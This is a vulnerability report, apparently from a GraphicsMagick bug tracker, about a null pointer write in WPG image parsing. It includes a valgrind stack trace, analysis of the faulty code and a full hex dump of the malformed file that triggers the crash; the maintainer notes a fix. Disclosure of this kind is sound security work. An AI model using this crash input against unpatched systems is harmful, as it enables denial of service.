Null Pointer Dereference (Write) with malformed WPG Image
Swiss army knife of image processing
Brought to you by:
bfriesen
Running ./gm identify -verbose %file% with a malformed input WPG image results in an attempt to write to a Null Memory Address. The relevant stack trace can be seen here:
==26894== Invalid write of size 1 ==26894== at 0x69A596: ImportIndexQuantumType (import.c:404) ==26894== by 0x69A596: ImportViewPixelArea (import.c:3593) ==26894== by 0x693CF3: ImportImagePixelArea (import.c:278) ==26894== by 0x62F631: InsertRow (wpg.c:0) ==26894== by 0x62D923: UnpackWPGRaster (wpg.c:424) ==26894== by 0x62D923: ReadWPGImage (wpg.c:1130) ==26894== by 0x45B26A: ReadImage (constitute.c:1607) ==26894== by 0x4263C8: IdentifyImageCommand (command.c:8377) ==26894== by 0x42748F: MagickCommand (command.c:8872) ==26894== by 0x441390: GMCommandSingle (command.c:17393) ==26894== by 0x440708: GMCommand (command.c:17446) ==26894== by 0x4032E5: main (gm.c:61) ==26894== Address 0x0 is not stack'd, malloc'd or (recently) free'd ==26894==
Going through the source, it looks like the ImportIndexQuantumType function in magick/import.c is being invoked with an indexes value of NULL. This is being dereferenced in *indexes++=index, where the program is trying to store the value of index at 0x01 memory address.
The hex-dump of the input which is triggering the vulnerability is:
0000000 57ff 4350 0016 0000 1630 0001 3030 0000 0000010 3030 3030 3030 3014 3030 3030 3030 3030 0000020 3030 0030 0001 0008 3030 3030 3030 3030 0000030 3030 3030 3030 3030 3030 3030 3030 3030 0000040 3030 3030 3030 3030 fb30 3030 3030 3030 0000050 3030 3030 3030 3030 3030 3030 3030 3030 * 0000140 3030 3030 3030 3013 3030 3030 3030 3030 0000150 3030 3030 3030 3030 3030 3030 3030 3030 * 00001b0 3030 3030 3030 3030 3030 3030 3030 ff1b 00001c0 007f 3030 3030 3030 3030 3030 3030 3030 00001d0 3030 3030 3030 3030 3030 3030 3030 3030 * 00001f0 3030 3030 3030 3030 3030 3030 3030 021c 0000200 3030 3030 3030 3030 3030 3030 3030 3030 * 0000270 3030 3030 307f 3030 3030 3030 3030 3030 0000280 3030 3030 3030 3030 3030 3030 3030 3030 * 00002f0 3030 3030 2a30 3030 3030 3030 3030 3030 0000300 3030 3030 3030 3030 3030 3030 3030 3030 * 0000320 2c30 3030 3030 3030 3030 3030 3030 3030 0000330 3030 3030 3030 3030 3030 3030 3030 3030 0000340 3030 3030 3030 3030 3030 3030 3030 3014 0000350 3030 3030 3030 3030 3030 0030 3030 0004 * 0000365
Environmental Information:
This problem is fixed by Mercurial changeset 15245:e8086faa52d0. Thank you very much for reporting it.